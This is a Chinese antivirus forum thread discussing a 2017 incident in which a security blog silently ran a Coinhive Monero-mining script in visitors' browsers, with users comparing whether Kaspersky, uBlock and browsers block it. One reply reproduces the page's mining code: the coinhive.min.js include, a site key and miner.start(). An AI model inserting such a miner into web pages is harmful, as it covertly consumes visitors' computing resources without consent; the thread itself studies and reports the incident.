火绒所说的网页挖矿病毒。卡巴斯基中招了

显示全部楼层 · 发表于 2017-12-28 19:45:38

本帖最后由 JAYSIR 于 2017-12-29 22:00 编辑

更新下，目前网站已经移除了这个js脚本，但是访问以下链接仍然有效。https://coinhive.com/lib/coinhive.min.js

附上js 脚本，卡巴斯基秒杀

卡巴斯基是可以拦截的，默认开启了加密连接扫描即可拦截，之前我嫌麻烦把组件给关了

火绒安全警报：安全博客网站内含病毒利用用户电脑疯狂“挖矿”12月28日，火绒安全团队发出警报，一个名为“邪恶十六进制”的安全博客网站（www.evil0x.com）的网页携带病毒“Trojan/JS.CoinMiner.d”，所有访问该网站的用户电脑，都会被当作“肉鸡”用来挖矿（生产“门罗币”）。目前，“火绒安全软件”最新版可拦截该网站，建议广大网友不要点击该网网站的任何网址。

火绒工程师发现，在访问“邪恶十六进制”网站（www.evil0x.com）时，电脑会出现严重卡顿、CPU消耗过高等异常状况，这就是因为电脑正在被用来“挖矿”。该病毒并不会植入用户电脑，因此离开该网站的网页后，电脑即会恢复正常。

“邪恶十六进制”以分享安全技术文章为主要内容，吸引大批对安全技术感兴趣的网友访问其网站，并经常有网友将带毒文章页面转发至各大论坛，而所有点击该网址的用户电脑都将被用来“挖矿”。火绒安全工程师建议，不要转载，也不要点击“邪恶十六进制”的任何网页。

“火绒安全软件”最新版可拦截该网站。非火绒用户，请尽快登陆火绒官网下载软件，无需任何操作，产品默认设置即可拦截该网站。

火绒的官微推送了这么一条公告，我很好奇，这个网页的挖矿病毒是通过什么执行的，漏洞？js下载到本地然后执行？一般的杀软应该有能力查杀才对啊，我刚才直接firefox实机测试了，卡巴斯基没有任何反应。
截至目前cpu核gpu也没有任何的异常

网址： www.evil0x.com

更新下，下面同学提到插件屏蔽了，开始我也怀疑被屏蔽了，于是我去掉插件再试了下，的确中招了，不过关掉浏览器就没了，有兴趣的同学可以试试

再次更新下，截至目前仍然存在，卡巴斯基是可以拦截的，没拦截的原因是我关闭了扫描加密连接，开启后马上就拦截了。我的锅

正如 @pal家族所说，这个是基于https的js脚本，不开启加密流量扫描时找不到的。。。因为网站是http网站我忽略了

哥们你这个挖矿是这个地址https://coinhive.com/lib/coinhive.min.js
所以当然不拦截。。https扫描以及被关闭了嘛

显示全部楼层 · 发表于 2017-12-28 19:49:14

ublock给你拦截了吧。猜测是JS脚本·执行·，关了网站就没事了。
网页源码中的一段

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('PsQh7IhxKEhsI4p18no0dwBQmQtmt208');
miner.start();
</script>

复制代码

显示全部楼层 · 发表于 2017-12-28 19:57:25

ublock可以拦截的，你要把插件关了再试

显示全部楼层 · 发表于 2017-12-28 20:01:43

本帖最后由 pal家族于 2017-12-28 20:02 编辑

卡巴没拦截，那你打开这个网址cpu飙升了吗没有，
答案是卡巴拦截的是挖矿js，你那边根本就没有加载相关脚本，所以卡巴不会检测
卡巴才不会无脑添加网址黑名单呢。。。那太LOW了

显示全部楼层 · 发表于 2017-12-28 20:04:06

alalei 发表于 2017-12-28 19:57
ublock可以拦截的，你要把插件关了再试

中招了，cpu 飙升，卡巴斯基没提示

显示全部楼层 · 发表于 2017-12-28 20:07:28

绯色鎏金发表于 2017-12-28 19:49
ublock给你拦截了吧。猜测是JS脚本·执行·，关了网站就没事了。
网页源码中的一段

是的，中招了，卡巴斯基没反应。。。

不过也不算很严重的病毒吧

显示全部楼层 · 发表于 2017-12-28 20:41:25

JAYSIR 发表于 2017-12-28 20:07
是的，中招了，卡巴斯基没反应。。。

不过也不算很严重的病毒吧

没有利用漏洞。

随着JS的进化，实际上浏览器已经是个小“虚拟机”，挖矿就是单纯的数学计算，用JS很好实现。

关掉网页就行了。

显示全部楼层 · 发表于 2017-12-28 20:45:30

。。。。额

显示全部楼层 · 发表于 2017-12-28 21:00:02

本帖最后由 aboringman 于 2017-12-28 21:06 编辑

js.

KAV其实有拦截的，因为目标网址早已在恶意网址数据库中。。。。。。

PS.搜狗浏览器访问中招，而Edge却能成功拦截，已哭晕在厕所。。。。。。

coinhive.com/lib/coinhive.min.js

复制代码

显示全部楼层 · 发表于 2017-12-28 21:16:47

aboringman 发表于 2017-12-28 21:00
js.

KAV其实有拦截的，因为目标网址早已在恶意网址数据库中。。。。。。

欺负我在用瑞星
。。。不能测试，，，

[其他相关] 火绒所说的网页挖矿病毒。卡巴斯基中招了

本帖子中包含更多资源

本帖子中包含更多资源

[其他相关] 火绒 所说的网页挖矿病毒。卡巴斯基中招了

本帖子中包含更多资源

本帖子中包含更多资源

[其他相关] 火绒所说的网页挖矿病毒。卡巴斯基中招了